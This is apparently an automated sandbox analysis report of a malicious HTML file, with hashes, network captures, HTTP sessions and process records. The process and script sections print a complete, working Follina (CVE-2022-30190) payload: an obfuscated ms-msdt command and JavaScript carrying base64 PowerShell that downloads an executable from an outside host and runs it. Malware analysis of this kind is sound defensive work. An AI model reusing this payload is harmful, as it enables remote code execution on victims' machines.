                    • Report size getting too big, too many NtWriteVirtualMemory calls found.
                    No simulations
                    No context
                    No context
                    No context
                    No context
                    No context
                    No created / dropped files found
                    File type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                    Entropy (8bit):6.049533660136345
                    TrID:
                      File name:fbGUvJ4AdV.html
                      File size:19189
                      MD5:da3469806af3aacbbbd22a763343fff2
                      SHA1:6d9fd23a4d32a5963c24d39b5402eeaf2a54f093
                      SHA256:c3afbf5a136b204e16eb6e1cf00cbb03ee36eff42f519f26f1d1d1e58f0b87e1
                      SHA512:7e0cbfb15bf2bc8bbbb1727ba9bcfc472bad56b6887457be564ab84b1d69c6ad81dc827e1d04cc57f3f3e4255494484073dee58a79a390e08fe3888939730a2d
                      SSDEEP:384:9W4t9eJgaU7XWH7/hjoNso7qSVUajB+IOFFUD6kNTPhFEsAll:neJgaUShENTHVFVwHM1phFEse
                      TLSH:A082C0A9D03658346DD45C134A753D96BD20FA75C4BC9B282E4CF72D532D4E1ED8283A
                      File Content Preview:<!DOctYpE hTmL>....<HtML>....<bodY>....<ScRiPT laNGUAGe="jscripT">....//Nn2wp6S4Yl6LHD8RlkuH2nRrwM4IwiGC2LqC6DJpN8XYHUc8JE1CS322bpIjLLlSzFr2pDpqdRNlULZdgV0m7sAoiC4lFm8MHONeXSmmMbu8RCnbuU8BXfdqJNfW9P9Ywgg9nOxJaWPpgS3g05gaFqEmQGOCbebhz32j6P95K6A0kX8Y1Cv7mnh
                      Icon Hash:78d0a8cccc88c460
                      TimestampSource PortDest PortSource IPDest IP
                      Sep 2, 2022 15:28:54.879998922 CEST49749443192.168.2.3172.217.168.78
                      Sep 2, 2022 15:28:54.880044937 CEST44349749172.217.168.78192.168.2.3
                      Sep 2, 2022 15:28:54.880124092 CEST49749443192.168.2.3172.217.168.78
                      Sep 2, 2022 15:28:54.880600929 CEST49749443192.168.2.3172.217.168.78
                      Sep 2, 2022 15:28:54.880621910 CEST44349749172.217.168.78192.168.2.3
                      Sep 2, 2022 15:28:54.894287109 CEST49750443192.168.2.3216.58.215.237
                      Sep 2, 2022 15:28:54.894330978 CEST44349750216.58.215.237192.168.2.3
                      Sep 2, 2022 15:28:54.894418001 CEST49750443192.168.2.3216.58.215.237
                      Sep 2, 2022 15:28:54.894710064 CEST49750443192.168.2.3216.58.215.237
                      Sep 2, 2022 15:28:54.894727945 CEST44349750216.58.215.237192.168.2.3
                      Sep 2, 2022 15:28:54.943497896 CEST44349749172.217.168.78192.168.2.3
                      Sep 2, 2022 15:28:54.960045099 CEST44349750216.58.215.237192.168.2.3
                      Sep 2, 2022 15:28:54.989614010 CEST49750443192.168.2.3216.58.215.237
                      Sep 2, 2022 15:28:54.989650965 CEST44349750216.58.215.237192.168.2.3
                      Sep 2, 2022 15:28:54.989794970 CEST49749443192.168.2.3172.217.168.78
                      Sep 2, 2022 15:28:54.989814043 CEST44349749172.217.168.78192.168.2.3
                      Sep 2, 2022 15:28:54.990809917 CEST44349749172.217.168.78192.168.2.3
                      Sep 2, 2022 15:28:54.990840912 CEST44349749172.217.168.78192.168.2.3
                      Sep 2, 2022 15:28:54.990910053 CEST49749443192.168.2.3172.217.168.78
                      Sep 2, 2022 15:28:54.991908073 CEST44349750216.58.215.237192.168.2.3
                      Sep 2, 2022 15:28:54.992002010 CEST49750443192.168.2.3216.58.215.237
                      Sep 2, 2022 15:28:54.993104935 CEST44349749172.217.168.78192.168.2.3
                      Sep 2, 2022 15:28:54.993181944 CEST49749443192.168.2.3172.217.168.78
                      Sep 2, 2022 15:28:54.993199110 CEST44349749172.217.168.78192.168.2.3
                      Sep 2, 2022 15:28:55.175978899 CEST49749443192.168.2.3172.217.168.78
                      Sep 2, 2022 15:28:56.073260069 CEST49750443192.168.2.3216.58.215.237
                      Sep 2, 2022 15:28:56.073594093 CEST49750443192.168.2.3216.58.215.237
                      Sep 2, 2022 15:28:56.073594093 CEST44349750216.58.215.237192.168.2.3
                      Sep 2, 2022 15:28:56.073848963 CEST49749443192.168.2.3172.217.168.78
                      Sep 2, 2022 15:28:56.073986053 CEST49749443192.168.2.3172.217.168.78
                      Sep 2, 2022 15:28:56.074013948 CEST44349749172.217.168.78192.168.2.3
                      Sep 2, 2022 15:28:56.074413061 CEST44349749172.217.168.78192.168.2.3
                      Sep 2, 2022 15:28:56.109338999 CEST44349749172.217.168.78192.168.2.3
                      Sep 2, 2022 15:28:56.109447956 CEST49749443192.168.2.3172.217.168.78
                      Sep 2, 2022 15:28:56.109489918 CEST44349749172.217.168.78192.168.2.3
                      Sep 2, 2022 15:28:56.109589100 CEST44349749172.217.168.78192.168.2.3
                      Sep 2, 2022 15:28:56.109668970 CEST49749443192.168.2.3172.217.168.78
                      Sep 2, 2022 15:28:56.115366936 CEST44349750216.58.215.237192.168.2.3
                      Sep 2, 2022 15:28:56.130569935 CEST44349750216.58.215.237192.168.2.3
                      Sep 2, 2022 15:28:56.130816936 CEST49750443192.168.2.3216.58.215.237
                      Sep 2, 2022 15:28:56.130831957 CEST44349750216.58.215.237192.168.2.3
                      Sep 2, 2022 15:28:56.130899906 CEST49750443192.168.2.3216.58.215.237
                      Sep 2, 2022 15:28:56.146040916 CEST49750443192.168.2.3216.58.215.237
                      Sep 2, 2022 15:28:56.146084070 CEST44349750216.58.215.237192.168.2.3
                      Sep 2, 2022 15:28:56.148969889 CEST49749443192.168.2.3172.217.168.78
                      Sep 2, 2022 15:28:56.148992062 CEST44349749172.217.168.78192.168.2.3
                      Sep 2, 2022 15:28:57.917635918 CEST49756443192.168.2.3172.217.168.36
                      Sep 2, 2022 15:28:57.917695045 CEST44349756172.217.168.36192.168.2.3
                      Sep 2, 2022 15:28:57.917794943 CEST49756443192.168.2.3172.217.168.36
                      Sep 2, 2022 15:28:57.918090105 CEST49756443192.168.2.3172.217.168.36
                      Sep 2, 2022 15:28:57.918113947 CEST44349756172.217.168.36192.168.2.3
                      Sep 2, 2022 15:28:57.978068113 CEST44349756172.217.168.36192.168.2.3
                      Sep 2, 2022 15:28:57.983189106 CEST49756443192.168.2.3172.217.168.36
                      Sep 2, 2022 15:28:57.983237028 CEST44349756172.217.168.36192.168.2.3
                      Sep 2, 2022 15:28:57.984797001 CEST44349756172.217.168.36192.168.2.3
                      Sep 2, 2022 15:28:57.984909058 CEST49756443192.168.2.3172.217.168.36
                      Sep 2, 2022 15:28:57.987863064 CEST49756443192.168.2.3172.217.168.36
                      Sep 2, 2022 15:28:57.988006115 CEST44349756172.217.168.36192.168.2.3
                      Sep 2, 2022 15:28:58.068564892 CEST49756443192.168.2.3172.217.168.36
                      Sep 2, 2022 15:28:58.068614006 CEST44349756172.217.168.36192.168.2.3
                      Sep 2, 2022 15:28:58.181607008 CEST49756443192.168.2.3172.217.168.36
                      Sep 2, 2022 15:29:07.962944984 CEST44349756172.217.168.36192.168.2.3
                      Sep 2, 2022 15:29:07.963063955 CEST44349756172.217.168.36192.168.2.3
                      Sep 2, 2022 15:29:07.963167906 CEST49756443192.168.2.3172.217.168.36
                      Sep 2, 2022 15:29:08.197738886 CEST49756443192.168.2.3172.217.168.36
                      Sep 2, 2022 15:29:08.197777033 CEST44349756172.217.168.36192.168.2.3
                      Sep 2, 2022 15:29:58.076714039 CEST49810443192.168.2.3172.217.168.36
                      Sep 2, 2022 15:29:58.076778889 CEST44349810172.217.168.36192.168.2.3
                      Sep 2, 2022 15:29:58.076863050 CEST49810443192.168.2.3172.217.168.36
                      Sep 2, 2022 15:29:58.077224016 CEST49810443192.168.2.3172.217.168.36
                      Sep 2, 2022 15:29:58.077243090 CEST44349810172.217.168.36192.168.2.3
                      Sep 2, 2022 15:29:58.127197027 CEST44349810172.217.168.36192.168.2.3
                      Sep 2, 2022 15:29:58.155210972 CEST49810443192.168.2.3172.217.168.36
                      Sep 2, 2022 15:29:58.155257940 CEST44349810172.217.168.36192.168.2.3
                      Sep 2, 2022 15:29:58.155771017 CEST44349810172.217.168.36192.168.2.3
                      Sep 2, 2022 15:29:58.163119078 CEST49810443192.168.2.3172.217.168.36
                      Sep 2, 2022 15:29:58.163317919 CEST44349810172.217.168.36192.168.2.3
                      Sep 2, 2022 15:29:58.208867073 CEST49810443192.168.2.3172.217.168.36
                      Sep 2, 2022 15:30:08.124836922 CEST44349810172.217.168.36192.168.2.3
                      Sep 2, 2022 15:30:08.125193119 CEST44349810172.217.168.36192.168.2.3
                      Sep 2, 2022 15:30:08.125253916 CEST49810443192.168.2.3172.217.168.36
                      Sep 2, 2022 15:30:53.141551971 CEST49810443192.168.2.3172.217.168.36
                      Sep 2, 2022 15:30:53.141625881 CEST44349810172.217.168.36192.168.2.3
                      Sep 2, 2022 15:31:38.253438950 CEST49810443192.168.2.3172.217.168.36
                      Sep 2, 2022 15:31:38.253495932 CEST44349810172.217.168.36192.168.2.3
                      TimestampSource PortDest PortSource IPDest IP
                      Sep 2, 2022 15:28:54.772237062 CEST5113953192.168.2.38.8.8.8
                      Sep 2, 2022 15:28:54.772720098 CEST5295553192.168.2.38.8.8.8
                      Sep 2, 2022 15:28:54.799750090 CEST53529558.8.8.8192.168.2.3
                      Sep 2, 2022 15:28:54.801990986 CEST53511398.8.8.8192.168.2.3
                      Sep 2, 2022 15:28:57.896194935 CEST5770453192.168.2.38.8.8.8
                      Sep 2, 2022 15:28:57.915808916 CEST53577048.8.8.8192.168.2.3
                      Sep 2, 2022 15:29:57.981518030 CEST5811953192.168.2.38.8.8.8
                      Sep 2, 2022 15:29:58.001106977 CEST53581198.8.8.8192.168.2.3
                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                      Sep 2, 2022 15:28:54.772237062 CEST192.168.2.38.8.8.80x5880Standard query (0)clients2.google.comA (IP address)IN (0x0001)
                      Sep 2, 2022 15:28:54.772720098 CEST192.168.2.38.8.8.80xbec1Standard query (0)accounts.google.comA (IP address)IN (0x0001)
                      Sep 2, 2022 15:28:57.896194935 CEST192.168.2.38.8.8.80x7fb0Standard query (0)www.google.comA (IP address)IN (0x0001)
                      Sep 2, 2022 15:29:57.981518030 CEST192.168.2.38.8.8.80x9f76Standard query (0)www.google.comA (IP address)IN (0x0001)
                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                      Sep 2, 2022 15:28:54.799750090 CEST8.8.8.8192.168.2.30xbec1No error (0)accounts.google.com216.58.215.237A (IP address)IN (0x0001)
                      Sep 2, 2022 15:28:54.801990986 CEST8.8.8.8192.168.2.30x5880No error (0)clients2.google.comclients.l.google.comCNAME (Canonical name)IN (0x0001)
                      Sep 2, 2022 15:28:54.801990986 CEST8.8.8.8192.168.2.30x5880No error (0)clients.l.google.com172.217.168.78A (IP address)IN (0x0001)
                      Sep 2, 2022 15:28:57.915808916 CEST8.8.8.8192.168.2.30x7fb0No error (0)www.google.com172.217.168.36A (IP address)IN (0x0001)
                      Sep 2, 2022 15:29:58.001106977 CEST8.8.8.8192.168.2.30x9f76No error (0)www.google.com172.217.168.36A (IP address)IN (0x0001)
                      • accounts.google.com
                      • clients2.google.com
                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      0192.168.2.349750216.58.215.237443C:\Program Files\Google\Chrome\Application\chrome.exe
                      TimestampkBytes transferredDirectionData
                      2022-09-02 13:28:56 UTC0OUTPOST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1
                      Host: accounts.google.com
                      Connection: keep-alive
                      Content-Length: 1
                      Origin: https://www.google.com
                      Content-Type: application/x-www-form-urlencoded
                      Sec-Fetch-Site: none
                      Sec-Fetch-Mode: no-cors
                      Sec-Fetch-Dest: empty
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
                      Cookie: CONSENT=PENDING+904; AEC=AakniGO7HqlHWlnoY-P22_SwwnNSfVGxlF1NgK5nuj5WLe313NyJi16g7z4; SOCS=CAISHAgCEhJnd3NfMjAyMjA4MDgtMF9SQzEaAmVuIAEaBgiAvOuXBg; NID=511=nUT82hOv6CVwMNqDg-sTtCMJJ6SQ1v_cCpfCpf5nt8EolEbal01GWFyjG01tqWQgh9ciRU880J6nLd2gdbhAJs44PsHAZaVQAFIbrqe2FmFgjrAAK7W9Z8u5LDvwsuZRng98jP6E23SJ4fsPIs326YmnuCwa92dRRCcB6MNeI_o
                      2022-09-02 13:28:56 UTC0OUTData Raw: 20
                      Data Ascii:
                      2022-09-02 13:28:56 UTC3INHTTP/1.1 200 OK
                      Content-Type: application/json; charset=utf-8
                      Access-Control-Allow-Origin: https://www.google.com
                      Access-Control-Allow-Credentials: true
                      X-Content-Type-Options: nosniff
                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                      Pragma: no-cache
                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                      Date: Fri, 02 Sep 2022 13:28:56 GMT
                      Strict-Transport-Security: max-age=31536000; includeSubDomains
                      Report-To: {"group":"IdentityListAccountsHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/IdentityListAccountsHttp/external"}]}
                      Content-Security-Policy: script-src 'report-sample' 'nonce-0X5lVZWT_mNw5ovhaKMYPg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/IdentityListAccountsHttp/cspreport;worker-src 'self'
                      Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/IdentityListAccountsHttp/cspreport/allowlist
                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/IdentityListAccountsHttp/cspreport
                      Cross-Origin-Opener-Policy: same-origin; report-to="IdentityListAccountsHttp"
                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                      Server: ESF
                      X-XSS-Protection: 0
                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                      Accept-Ranges: none
                      Vary: Accept-Encoding
                      Connection: close
                      Transfer-Encoding: chunked
                      2022-09-02 13:28:56 UTC4INData Raw: 31 31 0d 0a 5b 22 67 61 69 61 2e 6c 2e 61 2e 72 22 2c 5b 5d 5d 0d 0a
                      Data Ascii: 11["gaia.l.a.r",[]]
                      2022-09-02 13:28:56 UTC4INData Raw: 30 0d 0a 0d 0a
                      Data Ascii: 0


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      1192.168.2.349749172.217.168.78443C:\Program Files\Google\Chrome\Application\chrome.exe
                      TimestampkBytes transferredDirectionData
                      2022-09-02 13:28:56 UTC0OUTGET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=104.0.5112.81&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1
                      Host: clients2.google.com
                      Connection: keep-alive
                      X-Goog-Update-Interactivity: fg
                      X-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmieda
                      X-Goog-Update-Updater: chromecrx-104.0.5112.81
                      Sec-Fetch-Site: none
                      Sec-Fetch-Mode: no-cors
                      Sec-Fetch-Dest: empty
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
                      2022-09-02 13:28:56 UTC1INHTTP/1.1 200 OK
                      Content-Security-Policy: script-src 'report-sample' 'nonce-2NqIu_3Ygyr6l2RUZH06pw' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/clientupdate-aus/1
                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                      Pragma: no-cache
                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                      Date: Fri, 02 Sep 2022 13:28:56 GMT
                      Content-Type: text/xml; charset=UTF-8
                      X-Daynum: 5723
                      X-Daystart: 23336
                      X-Content-Type-Options: nosniff
                      X-Frame-Options: SAMEORIGIN
                      X-XSS-Protection: 1; mode=block
                      Server: GSE
                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                      Accept-Ranges: none
                      Vary: Accept-Encoding
                      Connection: close
                      Transfer-Encoding: chunked
                      2022-09-02 13:28:56 UTC2INData Raw: 32 63 61 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 67 75 70 64 61 74 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 75 70 64 61 74 65 32 2f 72 65 73 70 6f 6e 73 65 22 20 70 72 6f 74 6f 63 6f 6c 3d 22 32 2e 30 22 20 73 65 72 76 65 72 3d 22 70 72 6f 64 22 3e 3c 64 61 79 73 74 61 72 74 20 65 6c 61 70 73 65 64 5f 64 61 79 73 3d 22 35 37 32 33 22 20 65 6c 61 70 73 65 64 5f 73 65 63 6f 6e 64 73 3d 22 32 33 33 33 36 22 2f 3e 3c 61 70 70 20 61 70 70 69 64 3d 22 6e 6d 6d 68 6b 6b 65 67 63 63 61 67 64 6c 64 67 69 69 6d 65 64 70 69 63 63 6d 67 6d 69 65 64 61 22 20 63 6f 68 6f 72 74 3d 22 31 3a 3a 22 20 63 6f 68 6f 72 74 6e 61 6d 65 3d 22 22
                      Data Ascii: 2ca<?xml version="1.0" encoding="UTF-8"?><gupdate xmlns="http://www.google.com/update2/response" protocol="2.0" server="prod"><daystart elapsed_days="5723" elapsed_seconds="23336"/><app appid="nmmhkkegccagdldgiimedpiccmgmieda" cohort="1::" cohortname=""
                      2022-09-02 13:28:56 UTC2INData Raw: 6d 6d 68 6b 6b 65 67 63 63 61 67 64 6c 64 67 69 69 6d 65 64 70 69 63 63 6d 67 6d 69 65 64 61 2e 63 72 78 22 20 66 70 3d 22 31 2e 38 31 65 33 61 34 64 34 33 61 37 33 36 39 39 65 31 62 37 37 38 31 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 68 61 73 68 5f 73 68 61 32 35 36 3d 22 38 31 65 33 61 34 64 34 33 61 37 33 36 39 39 65 31 62 37 37 38 31 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 70 72 6f 74 65 63 74 65 64 3d 22 30 22 20 73 69 7a 65 3d 22 32 34 38 35 33 31 22 20 73 74 61 74 75 73 3d 22 6f 6b 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 2e 30 2e 36 22 2f 3e 3c 2f 61 70 70 3e 3c 2f
                      Data Ascii: mmhkkegccagdldgiimedpiccmgmieda.crx" fp="1.81e3a4d43a73699e1b7781723f56b8717175c536685c5450122b30789464ad82" hash_sha256="81e3a4d43a73699e1b7781723f56b8717175c536685c5450122b30789464ad82" protected="0" size="248531" status="ok" version="1.0.0.6"/></app></
                      2022-09-02 13:28:56 UTC3INData Raw: 30 0d 0a 0d 0a
                      Data Ascii: 0


                      Click to jump to process

                      Target ID:0
                      Start time:15:28:47
                      Start date:02/09/2022
                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank
                      Imagebase:0x7ff614650000
                      File size:2851656 bytes
                      MD5 hash:0FEC2748F363150DC54C1CAFFB1A9408
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate

                      Target ID:2
                      Start time:15:28:52
                      Start date:02/09/2022
                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1948 --field-trial-handle=1740,i,14618335365964935446,5264089186027307751,131072 /prefetch:8
                      Imagebase:0x7ff614650000
                      File size:2851656 bytes
                      MD5 hash:0FEC2748F363150DC54C1CAFFB1A9408
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate

                      Target ID:3
                      Start time:15:28:52
                      Start date:02/09/2022
                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\fbGUvJ4AdV.html
                      Imagebase:0x7ff614650000
                      File size:2851656 bytes
                      MD5 hash:0FEC2748F363150DC54C1CAFFB1A9408
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate

                      Target ID:16
                      Start time:15:29:57
                      Start date:02/09/2022
                      Path:C:\Windows\System32\msdt.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Windows\system32\msdt.exe" ms-msdt:/Id%20PcwDiagnOstic%20-skIP%20FORCE%20-paraM%20%22It_ReBrOwsefoRfILE=#fbK%20IT_LaunchMethod=ContextMenu%20IT_BrowseForFile=I$(Iex($(Iex('[SYStem.teXT.eNCoDiNG]'+[ChaR]0x3A+[cHaR]58+'UTF8.gEtSTRInG([SYStEm.conVeRT]'+[CHAR]58+[ChAR]58+'fROmbasE64strInG('+[ChaR]0X22+'c1RPcC1QUk9jZXNzIC1GT1JDZSAtTkFtZSAnbXNkdCc7JHNZID0gQWRkLVRZcEUgLW1FbUJFUmRFRmluaXRpT04gJ1tEbGxJbXBvcnQoInVSTE1vbi5kTEwiLCBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyIHUsc3RyaW5nIEksc3RyaW5nIGMsdWludCBzUCxJbnRQdHIgVik7JyAtTmFtZSAibHhQIiAtTmFtRVNwQWNlIEtJeCAtUGFzc1RocnU7ICRzWTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cHM6Ly9hLnBvbWYuY2F0L2lwcmlnay5leGUiLCIkZW5WOkFQUERBVEFcQ2JodHIuZXhlIiwwLDApO1NUQVJ0LVNMRWVwKDMpO1J1bkRsbDMyLkVYZSB6aXBmbGRyLmRsbCxSb3V0ZVRoZUNhbGwgIiRFbnY6QVBQREFUQVxDYmh0ci5leGUiO3NUb3AtUFJPQ0VzcyAtZm9SQ0UgLU5hbWUgJ3NkaWFnbmhvc3Qn'+[Char]34+'))'))))Ti/../../../../../../../../../../.mSi%20%22
                      Imagebase:0x7ff7d5070000
                      File size:1560576 bytes
                      MD5 hash:8BE43BAF1F37DA5AB31A53CA1C07EE0C
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: 00000010.00000002.697950028.0000023881AC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: 00000010.00000002.698155124.0000023881B59000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: 00000010.00000002.698121675.0000023881B50000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      Reputation:moderate

                      Script:

                      Code
                      0
                      location.href = "mS-" + "msDt:" + "/I" + "d" + " " + "Pcw" + "Dia" + "gnOs" + "ti" + "c" + " " + "-sk" + "IP" + " " + "FOR" + "C" + "E" + " " + "-pa" + "raM" + " " + "\"" + "It_ReBrOwsef" + "oR" + "fIL" + "E" + "=" + "#fbK" + " " + "IT_LaunchMethod=ContextMen" + "u" + " " + "IT_" + "B" + "rows" + "eForF" + "ile" + "=" + "I" + "$(" + "Iex($(Iex('[SYStem.teXT.eNCoDiNG]'+[ChaR]0x3A+[cHaR]58+'UTF8.gEtSTRInG([SYStEm.conVeRT]'+[CHAR]58+[ChAR]58+'fROmbasE64strInG('+[ChaR]0X22+'c1RPcC1QUk9jZXNzIC1GT1JDZSAtTkFtZSAnbXNkdCc7JHNZID0gQWRkLVRZcEUgLW1FbUJFUmRFRmluaXRpT04gJ1tEbGxJbXBvcnQoInVSTE1vbi5kTEwiL" + "CBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyIHUsc3RyaW5nIEksc3RyaW5nIGMsdWludCBz" + "UCxJbnRQdHIgVik7JyAtTmFtZSAibHhQIiAtTmFtRVNwQWNlIEtJeCAtUGFzc1RocnU7ICRzWTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cHM6Ly" + "9hLnBvbWYuY2F0L2lwcmlnay5leGUiLCIkZW5WOkFQUERBVEFcQ2JodHIuZXhlIiwwLDApO1NUQVJ0LVNM" + "RWVwKDMpO1J1bkRsbDMyLkVYZSB6aXBmbGRyLmRsbCxSb3V0ZVRoZUNhbGwgIiRFbnY6QVBQREFUQVxDYmh0ci5leGUiO3NUb3AtUFJPQ0VzcyAtZm9SQ0UgLU5hbWUgJ3NkaWFnbmhvc3Qn'+" + "[Char]34+'))" + "'))))" + "T" + "i" + "/../../../" + "../../../../../../../" + ".mS" + "i" + " " + "\"";
                        Reset < >